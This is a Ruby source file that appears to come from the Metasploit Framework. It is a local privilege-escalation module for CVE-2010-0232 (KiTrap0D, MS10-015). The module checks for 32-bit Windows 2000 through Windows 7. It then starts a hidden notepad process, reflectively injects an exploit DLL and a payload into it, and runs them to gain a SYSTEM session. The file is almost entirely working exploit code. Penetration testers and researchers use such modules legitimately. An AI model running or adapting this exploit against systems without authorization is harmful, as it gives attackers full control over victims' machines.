metasploit-framework/modules/exploits/windows/local/ms10_015_kitrap0d.rb

102 lines
3.5 KiB
Ruby

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/post/windows/reflective_dll_injection'
require 'msf/core/exploit/exe'
require 'rex'
class Metasploit3 < Msf::Exploit::Local
Rank = GreatRanking
include Msf::Post::File
include Msf::Post::Windows::Priv
include Msf::Post::Windows::ReflectiveDLLInjection
def initialize(info={})
super( update_info( info,
'Name' => 'Windows SYSTEM Escalation via KiTrap0D',
'Description' => %q{
This module will create a new session with SYSTEM privileges via the
KiTrap0D exlpoit by Tavis Ormandy. If the session is use is already
elevated then the exploit will not run. The module relies on kitrap0d.x86.dll,
and is not supported on x64 editions of Windows.
},
'License' => MSF_LICENSE,
'Author' => [
'Tavis Ormandy', # Original resesarcher and exploit creator
'HD Moore', # Port of Tavis' code to meterpreter module
'Pusscat', # Port of Tavis' code to meterpreter module
'OJ Reeves' # Port of meterpreter code to a windows local exploit
],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ],
'Targets' => [
[ 'Windows 2K SP4 - Windows 7 (x86)', { 'Arch' => ARCH_X86, 'Platform' => 'win' } ]
],
'DefaultTarget' => 0,
'References' => [
[ 'CVE', '2010-0232' ],
[ 'OSVDB', '61854' ],
[ 'MSB', 'MS10-015' ],
[ 'EDB', '11199' ],
[ 'URL', 'http://seclists.org/fulldisclosure/2010/Jan/341' ]
],
'DisclosureDate'=> "Jan 19 2010"
))
end
def check
# Validate platform architecture
if sysinfo["Architecture"] =~ /x64|WOW64/i
return Exploit::CheckCode::Safe
end
# Validate OS version
winver = sysinfo["OS"]
unless winver =~ /Windows 2000|Windows XP|Windows Vista|Windows 2003|Windows 2008|Windows 7/
return Exploit::CheckCode::Safe
end
return Exploit::CheckCode::Appears
end
def exploit
if is_system?
fail_with(Exploit::Failure::None, 'Session is already elevated')
end
if check == Exploit::CheckCode::Safe
fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system.")
end
print_status("Launching notepad to host the exploit...")
process = client.sys.process.execute("notepad.exe", nil, {'Hidden' => true})
host_process = client.sys.process.open(process.pid, PROCESS_ALL_ACCESS)
print_good("Process #{process.pid} launched.")
print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
library_path = ::File.join(Msf::Config.data_directory, "exploits",
"CVE-2010-0232", "kitrap0d.x86.dll")
library_path = ::File.expand_path(library_path)
print_status("Injecting exploit into #{process.pid} ...")
exploit_mem, offset = inject_dll_into_process(host_process, library_path)
print_status("Exploit injected. Injecting payload into #{process.pid}...")
payload_mem = inject_into_process(host_process, payload.encoded)
# invoke the exploit, passing in the address of the payload that
# we want invoked on successful exploitation.
print_status("Payload injected. Executing exploit...")
host_process.thread.create(exploit_mem + offset, payload_mem)
print_good("Exploit finished, wait for (hopefully privileged) payload execution to complete.")
end
end